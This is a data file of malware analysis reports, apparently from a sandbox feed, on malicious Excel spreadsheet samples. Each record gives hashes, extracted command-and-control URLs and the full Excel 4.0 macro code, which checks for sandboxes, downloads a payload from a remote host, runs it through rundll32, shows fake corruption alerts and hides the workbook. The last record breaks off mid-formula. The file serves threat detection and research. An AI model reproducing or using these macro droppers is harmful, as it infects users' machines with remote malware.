{"version":"0.2","sample":{"sample":"","kind":"file","target":"84fd67ac34cdaa31d50923934df113f2cf90eb1e830261eabf05c46a6ff3b9bf"},"analysis":{"reported":"2020-04-09T16:17:25Z","score":10},"files":[{"filename":"84fd67ac34cdaa31d50923934df113f2cf90eb1e830261eabf05c46a6ff3b9bf","filesize":168960,"md5":"86f2b946d1e24f0317819e9e12f20a93","sha1":"591c2bcc4f984e65bf40f56b62bdbd78528e360e","sha256":"84fd67ac34cdaa31d50923934df113f2cf90eb1e830261eabf05c46a6ff3b9bf","sha512":"622586105dc0621d4842ec6006b2096c000ee2f9762a4055fda577f8a1037d5cfee4b8b12ac6a6941915f9cce1dad43b0ce00618367dbdd03eb47aa2633ffdb3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"84fd67ac34cdaa31d50923934df113f2cf90eb1e830261eabf05c46a6ff3b9bf.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"qi3taLeNld\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"84fe722262858b307124d2456bbe15fa4b27679c565aabc5de4174eea6b5f5dd"},"analysis":{"reported":"2020-04-09T16:17:25Z","score":10},"files":[{"filename":"84fe722262858b307124d2456bbe15fa4b27679c565aabc5de4174eea6b5f5dd","filesize":167936,"md5":"aa47fe59c781cb183158803b8bb9969d","sha1":"6bb871cc650e350c36c55afac4e6d5007e27b6ac","sha256":"84fe722262858b307124d2456bbe15fa4b27679c565aabc5de4174eea6b5f5dd","sha512":"27eb6c9e456bb8c851863a5a4b4f4ac228010d7abdfd5d474ed39b13a57c4c9ee8be50b60cda0b4cddac099cf4cfc40d37283e10323e86b0d03616175935606e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"84fe722262858b307124d2456bbe15fa4b27679c565aabc5de4174eea6b5f5dd.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"7d1PbAP3DN\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"850c178573fbc4099dca815b6625715261cad90f0ff50afd1d1bcc914a9fcd9e"},"analysis":{"reported":"2020-04-09T16:17:25Z","score":10},"files":[{"filename":"850c178573fbc4099dca815b6625715261cad90f0ff50afd1d1bcc914a9fcd9e","filesize":185344,"md5":"0f3a389d436f634fa2b9826a66277a08","sha1":"55cc53285dd2b17fd5f280680b72afb447bc08ac","sha256":"850c178573fbc4099dca815b6625715261cad90f0ff50afd1d1bcc914a9fcd9e","sha512":"54ea185c9585a66958aa9b46d37759b252d88031399eb692cea5f9bd7398f0e4843b1a6bbca73f4e03dc42113a3fed49a24621e09b0f75c62ef67a5111c29428","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"850c178573fbc4099dca815b6625715261cad90f0ff50afd1d1bcc914a9fcd9e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"85199e9fc6e8f17ddaf071025ecbdf183a0e24b53e03ff551b8c66f26aac409c"},"analysis":{"reported":"2020-04-09T16:17:25Z","score":10},"files":[{"filename":"85199e9fc6e8f17ddaf071025ecbdf183a0e24b53e03ff551b8c66f26aac409c","filesize":152576,"md5":"1fdc757501d31259c05871224da8ab2f","sha1":"f9419e1e924ac6e5c6284ae8f354f53702f3fcf0","sha256":"85199e9fc6e8f17ddaf071025ecbdf183a0e24b53e03ff551b8c66f26aac409c","sha512":"df6f39046dcd54e4cd4ac499986029b43ceb4868fcea96319602f38631af8cc5f8bba4d98e3c251ed62307618bef4174fd9f4d2249f83f126ba742d716e1dbd7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"85199e9fc6e8f17ddaf071025ecbdf183a0e24b53e03ff551b8c66f26aac409c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ESUk9EsLoW\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8548bf0abafab007089ecc85cc71c9e93956bd15b562cb1f4e7392761b304e33"},"analysis":{"reported":"2020-04-09T16:17:25Z","score":10},"files":[{"filename":"8548bf0abafab007089ecc85cc71c9e93956bd15b562cb1f4e7392761b304e33","filesize":214528,"md5":"37b95c0827dfd23ada46d54ef5f5b347","sha1":"9ef3d04fce3f1fb009fe008b23bdf9e7cdd0504c","sha256":"8548bf0abafab007089ecc85cc71c9e93956bd15b562cb1f4e7392761b304e33","sha512":"939c24bae62c06401867fc81f360e87c081214444b79c3e78137f4f0765ab11206f689d5739d0e33f53c08488e8ecc35339b71596f6ee9877b669a70378144f2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8548bf0abafab007089ecc85cc71c9e93956bd15b562cb1f4e7392761b304e33.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv43g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv43g\",\"c:\\Users\\Public\\bug75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"1KveKUlneE\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"854ada45f6a80e645d8781c0d6a0411d8f5e4c93ae789e140ca863c02bbe8d69"},"analysis":{"reported":"2020-04-09T16:17:25Z","score":10},"files":[{"filename":"854ada45f6a80e645d8781c0d6a0411d8f5e4c93ae789e140ca863c02bbe8d69","filesize":132608,"md5":"8fb777cfe3d99551f263605a3eefdfae","sha1":"d61af4000699e7afc19c7f1503afbf5e64dc02e8","sha256":"854ada45f6a80e645d8781c0d6a0411d8f5e4c93ae789e140ca863c02bbe8d69","sha512":"9caeeb25c8529f4553dd0a5b82dbe8a8b251171f956a55f37ec8cf816bd46f916aa9b08d23a5f10968ec44052ab8fc1d383da05b1b8096f782a5181d17f3dd53","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"854ada45f6a80e645d8781c0d6a0411d8f5e4c93ae789e140ca863c02bbe8d69.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rosannahtacey.xyz/vg43"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rosannahtacey.xyz/vg43\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"3iUR05ttOX\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"855018b5fd472c32a187ee456f9a64810be1bb908e8fe937838fce35e3e71d78"},"analysis":{"reported":"2020-04-09T16:17:25Z","score":10},"files":[{"filename":"855018b5fd472c32a187ee456f9a64810be1bb908e8fe937838fce35e3e71d78","filesize":185344,"md5":"60a610bd6ffec88bc882c9be565e4aff","sha1":"2b5799d7bbbcb5d6584d641e8e1657cb3b52d251","sha256":"855018b5fd472c32a187ee456f9a64810be1bb908e8fe937838fce35e3e71d78","sha512":"3b523d418cb1dccb51c9643f139430603d3f59218b8efffd1d450c1c3787d8943fb99309acd192bf2817e4e9a4c435bbb8553a6a9ec1663444a340e5c5abe29a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"855018b5fd472c32a187ee456f9a64810be1bb908e8fe937838fce35e3e71d78.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8555945e954f234278e85bc6395b0040ec360ddcc95fe5fa06f70a2fce62367d"},"analysis":{"reported":"2020-04-09T16:17:25Z","score":10},"files":[{"filename":"8555945e954f234278e85bc6395b0040ec360ddcc95fe5fa06f70a2fce62367d","filesize":170496,"md5":"6654dabdb75e17a1df26e6465af826b6","sha1":"8bce7a95693721b18bd7eb070c648e3c629a80d0","sha256":"8555945e954f234278e85bc6395b0040ec360ddcc95fe5fa06f70a2fce62367d","sha512":"f94b925ea3ae78a3e5b73fe9c6a366903eb5e4f9d966ba7526e8bd6e50ac851729cf8fcdf022a95afe47c6e8ad6a4bb98e28e1897bac7dc635389d7a99cab36b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8555945e954f234278e85bc6395b0040ec360ddcc95fe5fa06f70a2fce62367d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"YLaTB70Z5p\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8556ea936b7be4d07b156403941681860e146eae68633999836ca6cfdfe084ad"},"analysis":{"reported":"2020-04-09T16:17:25Z","score":10},"files":[{"filename":"8556ea936b7be4d07b156403941681860e146eae68633999836ca6cfdfe084ad","filesize":209920,"md5":"fd20d6ca3d40ff914b46e6e01634553c","sha1":"c2ae06f019378712c601170db81b576d77b97d64","sha256":"8556ea936b7be4d07b156403941681860e146eae68633999836ca6cfdfe084ad","sha512":"2c1c021771a6f23a6014789db4ffc9b0283998a9259154b8566bd0cac60ad5cca37603b049cc8da7d637190374c8570a32747f8b33377dbd8e99bca66492abd7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8556ea936b7be4d07b156403941681860e146eae68633999836ca6cfdfe084ad.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"FF4JxlUWnO\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"856cc61a4f68ad2e7e6f8ec80617fa346a5b391799d9ed6d7d17f915543121b2"},"analysis":{"reported":"2020-04-09T16:17:25Z","score":10},"files":[{"filename":"856cc61a4f68ad2e7e6f8ec80617fa346a5b391799d9ed6d7d17f915543121b2","filesize":209408,"md5":"48688d99ee6197793def6a37f707ec86","sha1":"6af96a5f1f21f3eab7899f66b9661a7406e7af3a","sha256":"856cc61a4f68ad2e7e6f8ec80617fa346a5b391799d9ed6d7d17f915543121b2","sha512":"89ccf8faa86cd534113671d0ccf8d3ca8f20517316ec8cbdb08a4e77a9dfc5a7418c9023a58afa82014b9b2edcd36f133886bc754d5beb5406ea61a8c3051a82","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"856cc61a4f68ad2e7e6f8ec80617fa346a5b391799d9ed6d7d17f915543121b2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"hc5XqdiXay\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8573c8e4acd119f91bc99b75b052f3b48f542428084d1f8cd46af2c6d419d3b6"},"analysis":{"reported":"2020-04-09T16:17:26Z","score":10},"files":[{"filename":"8573c8e4acd119f91bc99b75b052f3b48f542428084d1f8cd46af2c6d419d3b6","filesize":142848,"md5":"ef7f363290a12eda7f823094870b1165","sha1":"bf9dbb9c99643b977b17030ae561a33db708fdc9","sha256":"8573c8e4acd119f91bc99b75b052f3b48f542428084d1f8cd46af2c6d419d3b6","sha512":"f71a0ff6f25ec0e63b5698ae6cad961c08cc7692dd925e0cccb6da47eea9a003c4d31fcd5b78568f8d4f46a1ccd957ea994a916603c12f0575b1735aed337dca","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8573c8e4acd119f91bc99b75b052f3b48f542428084d1f8cd46af2c6d419d3b6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/fsgbfgbfsg43"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"Ui9OJc8nnC\",TRUE)\nRETURN()\nRETURN()\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$20C$11\u003c770,CLOSE(FALSE),)\nIF(R$21C$11\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"858154c146d1cfa0997e15a9cfe7bccd7ced2bf6666f897340032207082f28fc"},"analysis":{"reported":"2020-04-09T16:17:26Z","score":10},"files":[{"filename":"858154c146d1cfa0997e15a9cfe7bccd7ced2bf6666f897340032207082f28fc","filesize":144384,"md5":"8ccea41db12a13c6b424fa7d046aecc9","sha1":"8618075a51663ebc434f9c98f5b9afcdf858328b","sha256":"858154c146d1cfa0997e15a9cfe7bccd7ced2bf6666f897340032207082f28fc","sha512":"492dfd835b55e60436ee3e6f30853ecad3b918cfe97152ca94fbbd46bc822c9bb2bd6f7cfa9e57604c84bcbc38b86b0159a3af9a99776d3b3399d09a19b58e7f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"858154c146d1cfa0997e15a9cfe7bccd7ced2bf6666f897340032207082f28fc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"WNArbYexmy\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8589291da90911b98d7aef88a04fe1de0bc84d21fa51635311610bb3f28c5ac5"},"analysis":{"reported":"2020-04-09T16:17:26Z","score":10},"files":[{"filename":"8589291da90911b98d7aef88a04fe1de0bc84d21fa51635311610bb3f28c5ac5","filesize":152576,"md5":"3de8eca231dc31354321ab33fcf70d2e","sha1":"b1cbff46ce5927da8b02691985508a6cc15db782","sha256":"8589291da90911b98d7aef88a04fe1de0bc84d21fa51635311610bb3f28c5ac5","sha512":"1eacb6033150d8677849708a285d4200b7f222129ca9e9743cabeda7fa975ac44980c6c0f5750e3de30a4e2d08ed012693b6d03267a8cac925d7ac66ca10a909","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8589291da90911b98d7aef88a04fe1de0bc84d21fa51635311610bb3f28c5ac5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"1nkXkopUm7\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"85904fb362d369d8e5a4b90fdea789987cc53418981314c56fc0e2c2eb9a0285"},"analysis":{"reported":"2020-04-09T16:17:26Z","score":10},"files":[{"filename":"85904fb362d369d8e5a4b90fdea789987cc53418981314c56fc0e2c2eb9a0285","filesize":113664,"md5":"2405cbba23c348c47f3009a7f3ba3d57","sha1":"329fa89e4d21a53da4559d36e7ac96dd9089dfb1","sha256":"85904fb362d369d8e5a4b90fdea789987cc53418981314c56fc0e2c2eb9a0285","sha512":"52e7c4a6ec4fc4efb9f7e78f5dd6608201006618e9aa2788191d5ebcf0a9129ff267beef8d3315e967bb21b2a60ef63e37e51a5296abfb94cb152cc82a4850b0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"85904fb362d369d8e5a4b90fdea789987cc53418981314c56fc0e2c2eb9a0285.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"qLvLv5VHOi\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"859c3a401fda6a70f367ba5d0e790e8a78c6cf28cc64ff41aa17394d1190953b"},"analysis":{"reported":"2020-04-09T16:17:26Z","score":10},"files":[{"filename":"859c3a401fda6a70f367ba5d0e790e8a78c6cf28cc64ff41aa17394d1190953b","filesize":185344,"md5":"945479ecbfd52240fe8332cdd4d8550a","sha1":"2b2cdedb618e52172bb6121e0ab33daedd5f4957","sha256":"859c3a401fda6a70f367ba5d0e790e8a78c6cf28cc64ff41aa17394d1190953b","sha512":"12e4dffb7f5a2d36898fef80e3142e3503afa554000862001a25965fa60cef3b7bb08a1c960c3f920b2fa902dce276576ff7c1e8f6b08a6b9445f46b86d5d1d6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"859c3a401fda6a70f367ba5d0e790e8a78c6cf28cc64ff41aa17394d1190953b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"85b87b320b1b23fd1cede16a0848e9d2003a0550499c3e3d8353067b272bf3ce"},"analysis":{"reported":"2020-04-09T16:17:26Z","score":10},"files":[{"filename":"85b87b320b1b23fd1cede16a0848e9d2003a0550499c3e3d8353067b272bf3ce","filesize":168987,"md5":"0329140140687466b21bb0f5e3825c2d","sha1":"9899e18dc1785917800dae04b2367bdd77140201","sha256":"85b87b320b1b23fd1cede16a0848e9d2003a0550499c3e3d8353067b272bf3ce","sha512":"a39b2f56aa8e32c1c918ea63b16efede1a32cb48a69f2f95cc9eb98999a1d234c8256adcf5baf1fe6d5a3b20e04b2ae4c3cdc312e596e80de378317d8a06594c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"85b87b320b1b23fd1cede16a0848e9d2003a0550499c3e3d8353067b272bf3ce.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), 